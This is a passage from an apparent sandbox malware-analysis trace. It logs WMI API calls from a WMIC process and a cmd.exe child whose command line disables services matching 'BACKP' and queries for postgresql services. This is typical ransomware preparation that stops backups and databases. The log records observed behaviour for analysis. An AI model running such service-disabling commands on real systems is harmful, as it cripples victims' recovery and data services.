varVal1=0x2e0140*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x2d2f30, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.729] SafeArrayGetLBound (in: psa=0x2e0140, nDim=0x1, plLbound=0x20eb30 | out: plLbound=0x20eb30) returned 0x0 [0118.729] SafeArrayGetUBound (in: psa=0x2e0140, nDim=0x1, plUbound=0x20eb10 | out: plUbound=0x20eb10) returned 0x0 [0118.729] lstrlenW (lpString="CIMTYPE") returned 7 [0118.729] lstrlenW (lpString="ValueMap") returned 8 [0118.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0118.729] lstrlenW (lpString="read") returned 4 [0118.729] lstrlenW (lpString="ValueMap") returned 8 [0118.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0118.729] lstrlenW (lpString="write") returned 5 [0118.729] lstrlenW (lpString="ValueMap") returned 8 [0118.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0118.729] lstrlenW (lpString="In") returned 2 [0118.729] lstrlenW (lpString="ValueMap") returned 8 [0118.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0118.729] lstrlenW (lpString="Out") returned 3 [0118.729] lstrlenW (lpString="ValueMap") returned 8 [0118.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0118.729] SafeArrayGetElement (in: psa=0x2e0140, rgIndices=0x20eb58, pv=0x20eb60 | out: pv=0x20eb60) returned 0x0 [0118.729] SafeArrayGetElement (in: psa=0x2e0140, rgIndices=0x20eb58, pv=0x20eb60 | out: pv=0x20eb60) returned 0x0 [0118.729] SafeArrayGetElement (in: psa=0x2e0140, rgIndices=0x20eb58, pv=0x20eb60 | out: pv=0x20eb60) returned 0x0 [0118.729] SafeArrayGetElement (in: psa=0x2e0140, rgIndices=0x20eb58, pv=0x20eb60 | out: pv=0x20eb60) returned 0x0 [0118.730] SafeArrayGetElement (in: psa=0x2e0140, rgIndices=0x20eb58, pv=0x20eb60 | out: pv=0x20eb60) returned 0x0 [0118.730] SysStringLen (param_1="ValueMap") returned 0x8 [0118.730] SysStringLen (param_1="In") returned 0x2 [0118.730] SysStringLen (param_1="In") returned 0x2 [0118.730] SysStringLen (param_1="ValueMap") returned 0x8 [0118.730] IUnknown:Release (This=0x303618) returned 0x1 [0118.730] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.730] IUnknown:Release (This=0x303028) returned 0x1 [0118.730] IUnknown:Release (This=0x301f90) returned 0x1 [0118.730] IUnknown:Release (This=0x2f5dd0) returned 0x0 [0118.731] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.731] lstrlenW (lpString="/") returned 1 [0118.731] lstrlenW (lpString="Disabled") returned 8 [0118.731] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="/", cchCount2=1) returned 3 [0118.731] lstrlenW (lpString="-") returned 1 [0118.731] lstrlenW (lpString="Disabled") returned 8 [0118.731] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="-", cchCount2=1) returned 3 [0118.731] lstrlenW (lpString="Disabled") returned 8 [0118.731] lstrlenW (lpString="Disabled") returned 8 [0118.731] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0118.731] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0118.731] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x406cabaa | out: _String="Select", _Context=0x406cabaa) returned="Select" [0118.731] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x406cabaa | out: _String=0x0, _Context=0x406cabaa) returned="*" [0118.731] lstrlenW (lpString="FROM") returned 4 [0118.731] lstrlenW (lpString="*") returned 1 [0118.731] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0118.731] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x406cabaa | out: _String=0x0, _Context=0x406cabaa) returned="from" [0118.731] lstrlenW (lpString="FROM") returned 4 [0118.731] lstrlenW (lpString="from") returned 4 [0118.731] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0118.731] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x406cabaa | out: _String=0x0, _Context=0x406cabaa) returned="Win32_Service" [0118.732] lstrlenW (lpString="SET") returned 3 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.732] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0118.732] lstrlenW (lpString="CREATE") returned 6 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.732] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0118.732] lstrlenW (lpString="GET") returned 3 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.732] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0118.732] lstrlenW (lpString="LIST") returned 4 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.732] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0118.732] lstrlenW (lpString="ASSOC") returned 5 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.732] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0118.732] WbemLocator:IUnknown:AddRef (This=0x2b1a48) returned 0x3 [0118.732] lstrlenW (lpString="") returned 0 [0118.732] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.732] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0118.732] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.732] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.732] GetCurrentThreadId () returned 0xfdc [0118.732] GetCurrentProcess () returned 0xffffffff [0118.732] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x20f668 | out: TokenHandle=0x20f668*=0x270) returned 1 [0118.732] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f664 | out: TokenInformation=0x0, ReturnLength=0x20f664) returned 0 [0118.732] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x659168, TokenInformationLength=0x118, ReturnLength=0x20f664 | out: TokenInformation=0x659168, ReturnLength=0x20f664) returned 1 [0118.732] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x659168*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0118.732] CloseHandle (hObject=0x270) returned 1 [0118.732] lstrlenW (lpString="GET") returned 3 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.732] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0118.732] lstrlenW (lpString="LIST") returned 4 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.732] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0118.732] lstrlenW (lpString="SET") returned 3 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.732] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.732] lstrlenW (lpString="CALL") returned 4 [0118.733] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0118.733] ??0CHString@@QAE@XZ () returned 0x20f628 [0118.733] GetCurrentThreadId () returned 0xfdc [0118.733] SysStringLen (param_1="\\\\") returned 0x2 [0118.733] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0118.733] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0118.733] SysStringLen (param_1="\\") returned 0x1 [0118.733] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0118.733] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0118.733] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2b1a48, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0x2d0888) returned 0x0 [0118.739] CoSetProxyBlanket (pProxy=0x2d0888, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0118.739] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.739] ??0CHString@@QAE@XZ () returned 0x20f624 [0118.739] GetCurrentThreadId () returned 0xfdc [0118.739] lstrlenA (lpString="") returned 0 [0118.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x653b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0118.739] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0118.739] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0118.739] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x406ca8ce | out: _String="Select", _Context=0x406ca8ce) returned="Select" [0118.740] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x406ca8ce | out: _String=0x0, _Context=0x406ca8ce) returned="*" [0118.740] lstrlenW (lpString="FROM") returned 4 [0118.740] lstrlenW (lpString="*") returned 1 [0118.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0118.740] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x406ca8ce | out: _String=0x0, _Context=0x406ca8ce) returned="from" [0118.740] lstrlenW (lpString="FROM") returned 4 [0118.740] lstrlenW (lpString="from") returned 4 [0118.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0118.740] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x406ca8ce | out: _String=0x0, _Context=0x406ca8ce) returned="Win32_Service" [0118.740] IWbemServices:GetObject (in: This=0x2d0888, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x20f5fc*=0x0, ppCallResult=0x0 | out: ppObject=0x20f5fc*=0x32b7f8, ppCallResult=0x0) returned 0x0 [0118.773] IWbemClassObject:GetMethod (in: This=0x32b7f8, wszName="ChangeStartMode", lFlags=0, ppInSignature=0x20f608, ppOutSignature=0x20f5f4 | out: ppInSignature=0x20f608*=0x32bce8, ppOutSignature=0x20f5f4*=0x32c068) returned 0x0 [0118.773] IWbemClassObject:SpawnInstance (in: This=0x32bce8, lFlags=0, ppNewInstance=0x20f614 | out: ppNewInstance=0x20f614*=0x32c260) returned 0x0 [0118.773] IWbemClassObject:GetNames (in: This=0x32bce8, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x20f618 | out: pNames=0x20f618*="\x01ƀ\x04") returned 0x0 [0118.788] SafeArrayGetLBound (in: psa=0x2dfdb0, nDim=0x1, plLbound=0x20f5c4 | out: plLbound=0x20f5c4) returned 0x0 [0118.788] SafeArrayGetUBound (in: psa=0x2dfdb0, nDim=0x1, plUbound=0x20f60c | out: plUbound=0x20f60c) returned 0x0 [0118.788] SafeArrayGetElement (in: psa=0x2dfdb0, rgIndices=0x20f600, pv=0x20f628 | out: pv=0x20f628) returned 0x0 [0118.788] IWbemClassObject:GetPropertyQualifierSet (in: This=0x32c260, wszProperty="StartMode", ppQualSet=0x20f4e8 | out: ppQualSet=0x20f4e8*=0x2dea70) returned 0x0 [0118.788] IWbemQualifierSet:Get (in: This=0x2dea70, wszName="CIMTYPE", lFlags=0, pVal=0x20f4b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x20f4b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0118.789] IWbemClassObject:Get (in: This=0x32c260, wszName="StartMode", lFlags=0, pVal=0x20f490*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x20f4cc*=2159796, plFlavor=0x0 | out: pVal=0x20f490*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x20f4cc*=8, plFlavor=0x0) returned 0x0 [0118.789] IWbemQualifierSet:Get (in: This=0x2dea70, wszName="read", lFlags=0, pVal=0x20f4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x20f4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0118.789] IWbemQualifierSet:Get (in: This=0x2dea70, wszName="write", lFlags=0, pVal=0x20f4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x20f4d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0118.789] IWbemQualifierSet:Get (in: This=0x2dea70, wszName="Description", lFlags=0, pVal=0x20f4a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x20f4a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0118.789] lstrlenA (lpString="Not Available") returned 13 [0118.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301d64, cbMultiByte=-1, lpWideCharStr=0x6592d8, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0118.789] IUnknown:Release (This=0x2dea70) returned 0x0 [0118.790] lstrlenW (lpString="StartMode") returned 9 [0118.790] lstrlenW (lpString="StartMode") returned 9 [0118.790] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="StartMode", cchCount1=9, lpString2="StartMode", cchCount2=9) returned 2 [0118.790] SysStringLen (param_1="In") returned 0x2 [0118.790] SysStringLen (param_1="MaxLen") returned 0x6 [0118.790] SysStringLen (param_1="ValueMap") returned 0x8 [0118.790] SysStringLen (param_1="MaxLen") returned 0x6 [0118.790] SysStringLen (param_1="MaxLen") returned 0x6 [0118.790] SysStringLen (param_1="ValueMap") returned 0x8 [0118.790] lstrlenW (lpString="") returned 0 [0118.790] lstrlenW (lpString="STRING") returned 6 [0118.790] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0118.790] lstrlenW (lpString="string") returned 6 [0118.790] lstrlenW (lpString="STRING") returned 6 [0118.790] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0118.790] SysStringLen (param_1="In") returned 0x2 [0118.790] SysStringLen (param_1="ValueMap") returned 0x8 [0118.790] SysStringLen (param_1="ValueMap") returned 0x8 [0118.790] SysStringLen (param_1="ValueMap") returned 0x8 [0118.790] SysStringLen (param_1="ValueMap") returned 0x8 [0118.790] SysStringLen (param_1="ValueMap") returned 0x8 [0118.790] lstrlenW (lpString="Boot") returned 4 [0118.790] lstrlenW (lpString="Disabled") returned 8 [0118.790] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Boot", cchCount2=4) returned 3 [0118.790] lstrlenW (lpString="System") returned 6 [0118.790] lstrlenW (lpString="Disabled") returned 8 [0118.791] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="System", cchCount2=6) returned 1 [0118.791] lstrlenW (lpString="Automatic") returned 9 [0118.791] lstrlenW (lpString="Disabled") returned 8 [0118.791] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Automatic", cchCount2=9) returned 3 [0118.791] lstrlenW (lpString="Manual") returned 6 [0118.791] lstrlenW (lpString="Disabled") returned 8 [0118.791] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Manual", cchCount2=6) returned 1 [0118.791] lstrlenW (lpString="Disabled") returned 8 [0118.791] lstrlenW (lpString="Disabled") returned 8 [0118.791] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Disabled", cchCount2=8) returned 2 [0118.791] IWbemClassObject:GetPropertyQualifierSet (in: This=0x32c260, wszProperty="StartMode", ppQualSet=0x20f4f0 | out: ppQualSet=0x20f4f0*=0x2dea70) returned 0x0 [0118.791] IWbemQualifierSet:Get (in: This=0x2dea70, wszName="CIMTYPE", lFlags=0, pVal=0x20f4d4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x20f4d4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0118.791] IWbemClassObject:Get (in: This=0x32c260, wszName="StartMode", lFlags=0, pVal=0x20f4c4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x20f4e4*=2159204, plFlavor=0x0 | out: pVal=0x20f4c4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x20f4e4*=8, plFlavor=0x0) returned 0x0 [0118.791] IUnknown:Release (This=0x2dea70) returned 0x0 [0118.791] lstrlenW (lpString="string") returned 6 [0118.791] lstrlenW (lpString="string") returned 6 [0118.791] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0118.791] IWbemClassObject:Put (This=0x32c260, wszName="StartMode", lFlags=0, pVal=0x20f588*(varType=0x8, wReserved1=0x130, wReserved2=0x6, wReserved3=0x0, varVal1="Disabled", varVal2=0x0), Type=0) returned 0x0 [0118.792] IUnknown:Release (This=0x32bce8) returned 0x0 [0118.792] IUnknown:Release (This=0x32c068) returned 0x0 [0118.792] IUnknown:Release (This=0x32b7f8) returned 0x0 [0118.793] ??0CHString@@QAE@XZ () returned 0x20f4d4 [0118.793] GetCurrentThreadId () returned 0xfdc [0118.793] lstrlenA (lpString="") returned 0 [0118.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x659c90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0118.793] lstrlenA (lpString="") returned 0 [0118.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x659c90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0118.793] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0118.793] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0118.793] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x406ca946 | out: _String="Select", _Context=0x406ca946) returned="Select" [0118.793] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x406ca946 | out: _String=0x0, _Context=0x406ca946) returned="*" [0118.793] lstrlenW (lpString="FROM") returned 4 [0118.793] lstrlenW (lpString="*") returned 1 [0118.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0118.793] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x406ca946 | out: _String=0x0, _Context=0x406ca946) returned="from" [0118.793] lstrlenW (lpString="FROM") returned 4 [0118.793] lstrlenW (lpString="from") returned 4 [0118.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0118.793] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x406ca946 | out: _String=0x0, _Context=0x406ca946) returned="Win32_Service" [0118.793] lstrlenA (lpString="SELECT * FROM ") returned 14 [0118.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x659c90, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0118.793] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0118.793] SysStringLen (param_1="Win32_Service") returned 0xd [0118.794] lstrlenA (lpString=" WHERE ") returned 7 [0118.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x658d00, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0118.794] SysStringLen (param_1=" WHERE ") returned 0x7 [0118.794] SysStringLen (param_1="caption LIKE '%postgresql%'") returned 0x1b [0118.794] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0118.794] SysStringLen (param_1=" WHERE caption LIKE '%postgresql%'") returned 0x22 [0118.794] IWbemServices:ExecQuery (in: This=0x2d0888, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%postgresql%'", lFlags=48, pCtx=0x0, ppEnum=0x20f4dc | out: ppEnum=0x20f4dc*=0x32caa8) returned 0x0 [0118.808] CoSetProxyBlanket (pProxy=0x32caa8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0118.862] IEnumWbemClassObject:Next (in: This=0x32caa8, lTimeout=-1, uCount=0x1, apObjects=0x20f4e0, puReturned=0x20f4cc | out: apObjects=0x20f4e0*=0x0, puReturned=0x20f4cc*=0x0) returned 0x1 [0119.285] IUnknown:Release (This=0x32caa8) returned 0x0 [0119.285] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.286] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.286] GetCurrentThreadId () returned 0xfdc [0119.286] ??0CHString@@QAE@PBG@Z () returned 0x20f698 [0119.286] ??YCHString@@QAEABV0@PBG@Z () returned 0x20f698 [0119.286] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x65a118, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0119.286] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0119.286] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x659c90, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0119.286] __iob_func () returned 0x77ac1208 [0119.286] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0119.287] __iob_func () returned 0x77ac1208 [0119.287] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0119.287] ??1CHString@@QAE@XZ () returned 0x1 [0119.287] IUnknown:Release (This=0x2d0888) returned 0x0 [0119.287] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0119.287] _kbhit () returned 0x0 [0119.288] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0119.288] WbemLocator:IUnknown:Release (This=0x2b1a48) returned 0x2 [0119.288] IUnknown:Release (This=0x2d0ec8) returned 0x0 [0119.289] IUnknown:Release (This=0x2d0ab8) returned 0x0 [0119.289] WbemLocator:IUnknown:Release (This=0x2b1a48) returned 0x1 [0119.289] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0119.289] WbemLocator:IUnknown:Release (This=0x2b1a48) returned 0x0 [0119.290] CoUninitialize () [0119.304] exit (_Code=0) [0119.304] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.304] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 291 os_tid = 0xfe0 Thread: id = 292 os_tid = 0xfe4 Thread: id = 293 os_tid = 0xfe8 Thread: id = 294 os_tid = 0xfec Process: id = "67" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3f5a8000" os_pid = "0xff0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4386 start_va = 0x100000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 4387 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4388 start_va = 0x130000 end_va = 0x143fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 4389 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4390 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 4391 start_va = 0x290000 end_va = 0x293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 4392 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4393 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = private name = 